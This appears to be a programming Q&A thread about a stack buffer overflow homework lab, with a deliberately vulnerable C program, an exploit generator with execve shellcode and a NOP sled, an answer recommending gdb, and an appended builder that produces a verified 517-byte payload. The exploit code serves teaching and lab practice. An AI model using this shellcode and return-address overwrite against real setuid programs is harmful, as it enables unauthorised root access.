jubblybean

Reputation: 179

Buffer Overflow Attack Segmentation fault (core dumped)

I'm trying to complete my homework assignment on a buffer overflow attack to get into the root shell, but every time I run my stack.c it's giving me a segmentation fault. I was wondering if someone could point me in the right direction. I've

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

This is the one that I've edited.

/* exploit.c */
/* A program that creates a file containing code for launching a shell */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"      /* xorl     %eax,%eax   */
"\x50"          /* pushl    %eax        */
"\x68""//sh"    /* pushl    $0x68732f2f */
"\x68""/bin"    /* pushl    $0x6e69622f */
"\x89\xe3"      /* movl     %esp,%ebx   */
"\x50"          /* pushl    %eax        */
"\x53"          /* pushl    %ebx        */
"\x89\xe1"      /* movl     %esp,%ecx   */
"\x99"          /* cdq                  */
"\xb0\x0b"      /* movb     $0x0b,%al   */
"\xcd\x80"      /* int      $0x80       */
;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, sizeof(buffer));

    /* You need to fill the buffer with appropriate contents here */
    /* Guessed address of str[] in stack.c's main(); the saved return
       address of bof() is assumed to sit 24 bytes into the buffer.
       `long` is only 4 bytes when this is built as a 32-bit binary. */
    long buffer_start = 0xbffff174;
    long landing = buffer_start + 250;   /* points into the NOP sled */
    long* ptr = (long*)(buffer + 24);
    *ptr = landing;
    /* Shellcode (with its trailing NUL) goes at the very end of the buffer */
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}

Upvotes: 2

Views: 4120

Answers (1)

user4822941

Reputation:

Your question is quite puzzling.

Not only is it unclear how you compile this, it is also unclear how it is being run.

The shellcode in question assumes a 32-bit Linux binary. Further, the stack location of a 32-bit binary running on 64-bit Linux differs from what you can expect when running that binary on a 32-bit system, which in turn means the return address put in place of the old one must be computed with that taken into consideration. Chances are your school even told you to run a 32-bit VM or something.

Regardless, your first step should be to inspect the crash, which you can do with gdb (or another debugger, whatever is used in the class), which you should have been told about.

And here is the classic on the subject, written in 32-bit times: http://phrack.org/issues/49/14.html "Smashing The Stack For Fun And Profit"

Upvotes: 2
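The answer's point about the return address applies directly to the exploit in the question: it writes the address through a `long*`, which is 8 bytes on x86-64, and it never checks that the address it writes actually lands in the NOP sled. The builder below is an added example (not code from the question, the answer, or the lab) that constructs the same 517-byte badfile for stack.c with an explicit layout and refuses to emit a payload whose return address misses the sled, or that contains a NUL byte `strcpy()` would stop at. Addresses are encoded as 4 little-endian bytes, so the output is identical whether the builder is compiled as a 32-bit or a 64-bit program. The address 0xbffff174 and the offset 24 are the question's own guesses, used here as assumptions; both must be confirmed in gdb against the target binary (compare the saved return address gdb reports at the crash with the value written at offset 24).

```c
/* badfile_builder.c: added example, not part of the original post.
 * Layout of the payload consumed by stack.c:
 *   [NOP sled][fake saved EIP at ret_off][NOP sled][shellcode + NUL]
 * The fake EIP must point into the second sled: anything before it would
 * execute the address bytes themselves as instructions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BADFILE_LEN 517

/* The execve("/bin//sh") shellcode from the question: 24 bytes + NUL. */
static const char shellcode[] =
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

#define SHELLCODE_LEN sizeof(shellcode) /* 25; the NUL terminates strcpy() */

/* Encode a 32-bit address little-endian, independent of the host's long size. */
static void write_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)(v & 0xff);
    dst[1] = (uint8_t)((v >> 8) & 0xff);
    dst[2] = (uint8_t)((v >> 16) & 0xff);
    dst[3] = (uint8_t)((v >> 24) & 0xff);
}

static uint32_t read_le32(const uint8_t *src)
{
    return (uint32_t)src[0] | ((uint32_t)src[1] << 8) |
           ((uint32_t)src[2] << 16) | ((uint32_t)src[3] << 24);
}

/* Index of the first NUL byte in buf, or -1 if there is none. */
int first_nul(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return (int)i;
    return -1;
}

/* Fill out[0..out_len) with the payload.  Returns 0 on success,
 *  -1 if the return-address slot and the shellcode do not both fit,
 *  -2 if `landing` is not inside the sled between the fake EIP and the
 *     shellcode (pointing exactly at the shellcode start is allowed),
 *  -3 if any byte before the final one is NUL (strcpy would truncate).
 * buf_addr is the assumed address of stack.c's str[] on the target. */
int build_payload(uint8_t *out, size_t out_len, size_t ret_off,
                  uint32_t buf_addr, uint32_t landing)
{
    if (out_len < SHELLCODE_LEN || ret_off + 4 > out_len - SHELLCODE_LEN)
        return -1;

    size_t sled_lo = ret_off + 4;              /* first byte after fake EIP */
    size_t sled_hi = out_len - SHELLCODE_LEN;  /* first byte of shellcode */
    uint32_t lo = buf_addr + (uint32_t)sled_lo;
    uint32_t hi = buf_addr + (uint32_t)sled_hi;
    if (landing < lo || landing > hi)
        return -2;

    memset(out, 0x90, out_len);                /* NOP sled everywhere else */
    write_le32(out + ret_off, landing);        /* overwrite saved EIP */
    memcpy(out + sled_hi, shellcode, SHELLCODE_LEN);

    /* strcpy() in bof() copies up to the first NUL, so only the very last
       byte (the shellcode's terminator) may be zero. */
    if (first_nul(out, out_len - 1) != -1)
        return -3;
    return 0;
}

int main(void)
{
    uint8_t payload[BADFILE_LEN];
    uint32_t buf_addr = 0xbffff174u;           /* assumption from the question */
    int rc = build_payload(payload, sizeof payload, 24, buf_addr, buf_addr + 250);
    if (rc != 0) {
        fprintf(stderr, "payload layout rejected: %d\n", rc);
        return 1;
    }
    FILE *f = fopen("badfile", "wb");
    if (f == NULL) {
        perror("badfile");
        return 1;
    }
    fwrite(payload, 1, sizeof payload, f);
    fclose(f);
    return 0;
}
```

With the question's numbers the sled the fake EIP may point into runs from offset 28 to offset 492 (where the 25-byte shellcode starts), so `buf_addr + 250` passes; a landing address 10 bytes into the buffer is rejected because it would execute the address bytes at offset 24 as code. The builder only rules out layout mistakes: the target must still be the 32-bit binary the shellcode assumes, with the stack at the fixed address the fake EIP encodes, and the exact offset of bof()'s saved return address from str[] has to be read off the frame in gdb rather than assumed to be 24.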
